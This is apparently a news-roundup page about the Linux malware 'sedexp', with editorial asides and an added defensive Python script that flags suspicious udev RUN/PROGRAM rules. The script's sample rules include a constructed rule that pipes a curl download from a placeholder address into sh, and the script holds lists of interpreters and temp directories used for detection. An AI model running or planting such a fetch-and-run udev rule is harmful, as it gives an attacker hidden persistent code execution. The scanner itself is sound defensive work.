Drive-by FUD from Microsoft-Friendly Sites That Attribute to Linux Something That's Unexplained/Unattributed (and Dub It “sedexp”)
-
TechRadar ☛ This sneaky Linux malware went undetected for years, and is using all-new attack tactics [Ed: This is not the fault of Linux but whatever pulls it in, targeting the system]
Stroz Friedberg believes this piece of malware has been used since at least 2022, and found it in numerous online sandboxes, none of which triggered any antiviruses. The researchers believe the malware was used to hide a credit card skimmer.
-
CyberRisk Alliance LLC ☛ Advanced stealth of new sedexp malware for Linux detailed [Ed: Much focus on what it does once installed, not how it gets installed in the first place]
With the ability to deploy a remote shell allowing remote access to infected devices and memory modification, sedexp has been used by threat actors to facilitate the obfuscation of modified Apache configuration files, web shells, and the udev rule — which was noted by SUSE Linux to enable device node naming, node-pointing link inclusion, and specified program execution — a report from Aon's Stroz Friedberg incident response services team showed. "The malware was used to hide credit card scraping code on a web server, indicating a focus on financial gain. The discovery of sedexp demonstrates the evolving sophistication of financially motivated threat actors beyond ransomware," said researchers.
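The udev persistence these reports describe (a rule whose RUN+= or PROGRAM= assignment executes a program when a matching device event fires) is straightforward to triage once you know where rules live and what a packaged rule normally looks like. The script below is an added example written for this page, not Stroz Friedberg's or any vendor's tooling. It parses udev rule files (comments, backslash continuations, key/op/value pairs), keeps only the assignments that execute something, and flags those that point outside the packaged helper directories, launch an interpreter, or reference a world-writable temp directory. The trusted-prefix list, the interpreter list and the sample rules are assumptions for the demo; the sample is constructed and is not sedexp's actual rule.

```python
# Added example for this page (not Stroz Friedberg's or any vendor's code):
# triage udev rule files for RUN+= / PROGRAM= / IMPORT{program}= assignments
# that execute something from an untrusted location or via a shell.
# The sample rules at the bottom are constructed and are not sedexp's real rule.
import re
import shlex
from pathlib import Path

# Directories udev reads rules from (assumed standard layout).
RULE_DIRS = ("/etc/udev/rules.d", "/run/udev/rules.d",
             "/usr/local/lib/udev/rules.d", "/usr/lib/udev/rules.d",
             "/lib/udev/rules.d")
# Where a packaged udev helper is normally expected to live (assumption).
TRUSTED_PREFIXES = ("/usr/lib/udev/", "/lib/udev/", "/usr/lib/systemd/",
                    "/usr/bin/", "/bin/", "/usr/sbin/", "/sbin/")
# Interpreters an attacker typically uses to run arbitrary commands from a rule.
SHELLS = {"sh", "bash", "dash", "zsh", "python", "python3", "perl"}

# key[{attr}] op "value" -- only the keys and assignment ops that execute something.
EXEC_RE = re.compile(
    r'\b(?P<key>RUN|PROGRAM|IMPORT)(?:\{(?P<attr>[^}]*)\})?\s*(?::=|\+=|=)\s*'
    r'"(?P<val>(?:[^"\\]|\\.)*)"')


def _logical_lines(text):
    """Yield (lineno, line) with comment lines dropped and backslash continuations joined."""
    buf, start = "", 0
    for n, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not buf:
            start = n
        if line.endswith("\\"):
            buf += line[:-1] + " "
            continue
        buf += line
        if buf and not buf.startswith("#"):
            yield start, buf
        buf = ""


def classify(command):
    """Return the reasons a RUN/PROGRAM command looks suspicious (empty list = fine)."""
    reasons = []
    try:
        argv = shlex.split(command)
    except ValueError:
        return ["unparseable command"]
    if not argv:
        return reasons
    prog = argv[0]
    if prog.startswith("/") and not prog.startswith(TRUSTED_PREFIXES):
        reasons.append(f"program outside packaged helper dirs: {prog}")
    # udev(7): a relative program name is looked up under /usr/lib/udev, so it is
    # not flagged by path; an interpreter is flagged regardless of where it lives.
    if Path(prog).name in SHELLS:
        reasons.append(f"rule launches an interpreter: {' '.join(argv)}")
    if any(a.startswith(("/tmp/", "/dev/shm/", "/var/tmp/")) for a in argv):
        reasons.append("references a world-writable temp directory")
    return reasons


def scan_text(text, source="<inline>"):
    """Scan one rules file; return findings as (source, lineno, key, command, reasons)."""
    findings = []
    for lineno, line in _logical_lines(text):
        for m in EXEC_RE.finditer(line):
            attr = m.group("attr") or ""
            if m.group("key") == "IMPORT" and attr != "program":
                continue  # IMPORT{file}/IMPORT{builtin}/... do not run a command
            if m.group("key") == "RUN" and attr == "builtin":
                continue  # RUN{builtin} calls a udev builtin, not an external file
            cmd = m.group("val")
            reasons = classify(cmd)
            if reasons:
                findings.append((source, lineno, m.group("key"), cmd, reasons))
    return findings


def scan_system(dirs=RULE_DIRS):
    """Walk the real rule directories (run as root on a live host or a mounted image)."""
    findings = []
    for d in dirs:
        p = Path(d)
        if not p.is_dir():
            continue
        for f in sorted(p.glob("*.rules")):
            try:
                findings.extend(scan_text(f.read_text(errors="replace"), str(f)))
            except OSError:
                pass
    return findings


# Constructed sample: two packaged-style rules and two that should be flagged.
SAMPLE_RULES = """
# benign: relative helper resolved under /usr/lib/udev, and a builtin
KERNEL=="sd*", IMPORT{program}="scsi_id --export --whitelisted -d $devnode"
SUBSYSTEM=="block", RUN{builtin}+="blkid"
# suspicious: fires on every add event and runs an unpackaged binary
ACTION=="add", RUN+="/var/tmp/.cache/helper --daemon"
# suspicious: shell -c on a continuation line
ACTION=="add", SUBSYSTEM=="net", \\
    RUN+="/bin/sh -c 'curl -s http://203.0.113.9/x | sh'"
"""

if __name__ == "__main__":
    for src, n, key, cmd, why in scan_text(SAMPLE_RULES, "sample.rules") + scan_system():
        print(f"{src}:{n}: {key} {cmd!r}\n    " + "\n    ".join(why))
```

On a live host run it as root; on an image, point `scan_system()` at the mounted rule directories. A hit is a lead, not a verdict: check whether the rule file and the program it runs belong to a package (`rpm -qf` / `dpkg -S`), compare timestamps and hashes with a known-good system, and look at what the program does at runtime, which is the forensic work the reports above call for.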
-
Cyber Security News ☛ Stealthy Linux Malware ‘Sedexp’ Having Zero-detections Since 2022 [Ed: Focuses on persistence, but does nothing to explain how it gets into systems and what the culprit is]
This sophisticated approach makes the malware stealthier and more persistent, which makes it more difficult to detect.
-
Dolphin Publications B V ☛ Sedexp malware hides unseen in Linux kernel for years [Ed: Countermeasures here don't name which piece is vulnerable, whether it's misconfiguration, or a reckless admin installing it]
As a countermeasure, the researchers state that companies should continuously update their detection capabilities for these types of attacks, implement clear security measures to counter these attacks and engage experts to perform forensic investigations to discover potentially compromised servers.
-
Information Security Buzz ☛ Stealthy Linux Malware “sedexp” Exploits udev Rules for Persistence and Evasion
The analysis indicates that sedexp is being deployed by a financially motivated threat actor. So far, the malware has been used for credit card scraping, hiding malicious code on web servers to steal financial information. Despite its widespread presence, sedexp has managed to avoid detection, highlighting its stealthy nature and the need for advanced forensic analysis.
-
Security Affairs ☛ Linux malware sedexp uses udev rules for persistence and evasion [Ed: The researchers seem to be financially motivated and not exceptionally interested in explaining how this malware gets in]
The researchers believe that the threat actor behind the malware sedexp is financially motivated.
Mostly hype:
-
New GNU/Linux Malware ‘sedexp’ Hides Credit Card Skimmers Using Udev Rules
Recently, cybersecurity experts revealed a stealthy GNU/Linux malware that can hide credit card skimmer code. However, it is not new malware because Aon’s Stroz Friedberg team discovered and named it Sedexp in 2022. The Sedexp malware remained unidentified due to the advanced stealth techniques it uses to maintain persistence on systems.